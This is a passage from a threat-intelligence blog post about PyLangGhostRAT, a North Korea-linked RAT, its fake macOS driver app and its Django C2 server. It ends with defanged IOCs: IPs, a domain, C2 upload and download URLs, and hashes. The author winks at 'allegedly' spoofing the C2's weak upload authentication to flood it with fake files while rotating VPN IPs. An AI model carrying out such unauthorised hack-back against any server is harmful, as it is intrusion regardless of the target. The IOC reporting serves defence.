src="https://substackcdn.com/image/fetch/$s_!lxh2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png" width="1456" height="1128" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3ad0b182-efa0-4664-abce-971d0a9b537d_2024x1568.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1128,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:803967,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ad0b182-efa0-4664-abce-971d0a9b537d_2024x1568.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!lxh2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!lxh2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!lxh2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!lxh2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;config/constants.go&#8221; in the Go Malware</figcaption></figure></div><p>This is the <strong>exact command dictionary</strong> used by <strong><a href="https://www.nknews.org/pro/north-korea-deploys-ai-powered-python-malware-to-target-crypto-and-tech-workers/">PyLangGhostRAT</a></strong>, which I previously wrote about. It&#8217;s <strong>a vibecoded version of GoLangGhostRAT</strong>, converted to <strong>Python</strong> in a particularly atrocious way, and it has resurfaced once again. This boy has seen more scalpels than a Hollywood red carpet, yet it still stands.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LyWe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LyWe!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 424w, https://substackcdn.com/image/fetch/$s_!LyWe!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 848w, https://substackcdn.com/image/fetch/$s_!LyWe!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 1272w, https://substackcdn.com/image/fetch/$s_!LyWe!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LyWe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png" width="478" height="491.3706293706294" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:882,&quot;width&quot;:858,&quot;resizeWidth&quot;:478,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!LyWe!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 424w, https://substackcdn.com/image/fetch/$s_!LyWe!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 848w, https://substackcdn.com/image/fetch/$s_!LyWe!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 1272w, https://substackcdn.com/image/fetch/$s_!LyWe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d49603-d91c-4874-84b9-77af09dd1f7b_858x882.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">PyLangGhostRAT Configuration File, with the same values as the Go variant (Source: Me, for ANYRUN).</figcaption></figure></div><p>Let&#8217;s jump to the fake <strong>macOS app</strong>. Analysing it, we identify a connection to a <strong>Django web app acting as a C2 server.</strong> </p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3rjO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3rjO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 424w, https://substackcdn.com/image/fetch/$s_!3rjO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 848w, https://substackcdn.com/image/fetch/$s_!3rjO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 1272w, https://substackcdn.com/image/fetch/$s_!3rjO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3rjO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png" width="1456" height="295" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/822a8e73-c759-4307-9a7f-5ced4f29dafc_2644x536.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:295,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:359340,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F822a8e73-c759-4307-9a7f-5ced4f29dafc_2644x536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3rjO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 424w, https://substackcdn.com/image/fetch/$s_!3rjO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 848w, https://substackcdn.com/image/fetch/$s_!3rjO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 1272w, https://substackcdn.com/image/fetch/$s_!3rjO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff951be7c-29ca-4db4-af4e-ea9f66638dcd_2644x536.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">[clankering suddenly stops]</figcaption></figure></div><p>You know what time it is, right?</p><p>Time to teach them a little lesson about &#8220;<em>command and contro</em>l&#8221;&#8230;</p><div><hr></div><h2>Dear Leader</h2><p>We are not sending a letter, but rather <strong>a special package</strong> (and I thought this article could still hold one last literary reference).</p><p>As expected, when we combine their <strong>poor malware development skills</strong> with <strong>clanker-engineered code</strong>, both in their C2 and their malware, we are left with something&#8230; <strong>far from optimal in terms of security</strong>.</p><p>One of their upload endpoints holds a trivial authentication mechanism that can easily be spoofed on our end and used to <em>allegedly</em> upload arbitrary files, such as a ZIP archive containing multiple <strong>Quetzal Team</strong> logos, or <strong>fake datasets with fake victim date to pollute their storage and make it harder to pin down real victims</strong>. </p><p>Allegedly, of course.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8cH-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8cH-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 424w, https://substackcdn.com/image/fetch/$s_!8cH-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 848w, https://substackcdn.com/image/fetch/$s_!8cH-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 1272w, https://substackcdn.com/image/fetch/$s_!8cH-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8cH-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png" width="1456" height="833" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/198e8acb-4210-455e-b5fa-424e0eeac482_2364x1352.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:833,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:889981,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F198e8acb-4210-455e-b5fa-424e0eeac482_2364x1352.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8cH-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 424w, https://substackcdn.com/image/fetch/$s_!8cH-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 848w, https://substackcdn.com/image/fetch/$s_!8cH-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 1272w, https://substackcdn.com/image/fetch/$s_!8cH-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcae81b69-9245-4fdc-ab8f-6406727218c5_2364x1352.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">The moment some requests are blocked</figcaption></figure></div><p>Normally, we&#8217;d expect such a brutish attempt to be thwarted right away with little to no effort. Either you quickly rework the authentication snippet by adding additional controls, or you take the painful route of blocking each offending IP.</p><p>I bet them being equinopods, would choose the later, but making it extra painfully by waiting at least 70-100 attempts before noticing something was amiss. Of course, each time they blocked one IP, an attacker could just jump to another VPN node and resume their upload efforts. <em>Allegedly</em>.</p><p>At this rate, assuming at least <strong>50 allegedly successful uploads</strong> before they reactively block them, and with a couple of hundred IPs available in the pool (allegedly) to rotate, we can estimate the cloud server costs at&#8230; well, I&#8217;m not great at maths but we can definitely say <em>a lot</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LZ1g!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LZ1g!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!LZ1g!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!LZ1g!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!LZ1g!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LZ1g!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png" width="320" height="480" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:320,&quot;bytes&quot;:1618132,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LZ1g!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!LZ1g!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!LZ1g!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!LZ1g!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6cf34b5-7b2d-43b8-b5ed-8bc22fa97c99_1024x1536.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Some random pony-head wondering why his cloud server bill costs more than Argentina&#8217;s foreign debt</figcaption></figure></div><p>This article went on a little longer than expected, so it&#8217;s time to say goodbye, but not before sharing our classic tips and tricks:</p><p><strong>Stay safe.</strong></p><p>Don&#8217;t accept commands or applications from strangers on the internet.</p><p>Use clankers to draw ugly memes, not to code ugly malware.</p><p>Cyberbully your local threat actor.</p><p>And please, <em>don&#8217;t get rekt.</em></p><div><hr></div><h2>IOCs</h2><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;0d04cf3d-fa5e-47aa-b6da-242e606f52aa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">IPv4:144.172.93.88
IPv4:157.250.195.237
Domain:kit-haus[.]net
URL:hxxps[:]//kit-haus[.]net/mac-driver
URL:hxxp[:]//144.172.93.88:8080
URL:hxxp[:]//144.172.93.88:8088
File:gather.tar.gz
File:extdata.zip
File:CDriver.ChAudioFixer
File:ChAudioFixer.debug.dylib
File:DrivFixerNow.app
URL:hxxp[:]//144.172.93.88:8080/transfer/download/
URL:hxxp[:]//144.172.93.88:8080/transfer/upload/
URL:hxxp[:]//144.172.93.88:8080/upload/ 
URL:hxxp[:]//144.172.93.88:8080/gettext
SHA256:72f96d15c4ffb3abadcac3ec4299714f35ca4b732ad7db3d268712ee0692d713
SHA256:0a716920017fba0b70b7295c6d7a06710df38c0d6158a12d3723343919da7fd2
SHA256:97fe475a4177de4e55f3791276fb0553f28fcc19d4edb73038c1ad7238ae265f
SHA256:6ce66f7a2fe04fb451f12bcf4a1ac1c27b3fc02fac72c177d02f547c705e03e1</code></pre></div><div><hr></div><h2>References</h2><ul><li><p><strong><a href="https://otx.alienvault.com/pulse/699dee69e9f99ff57f109ea8">Level Blue Labs OTX - Original Intelligence Pulse by Quetzal Team</a></strong></p></li></ul><p></p><p style="text-align: center;"><em>Still here? Have a Special Edition muppet!</em></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1Hvs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1Hvs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!1Hvs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!1Hvs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!1Hvs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 1456w" sizes="100vw"><img 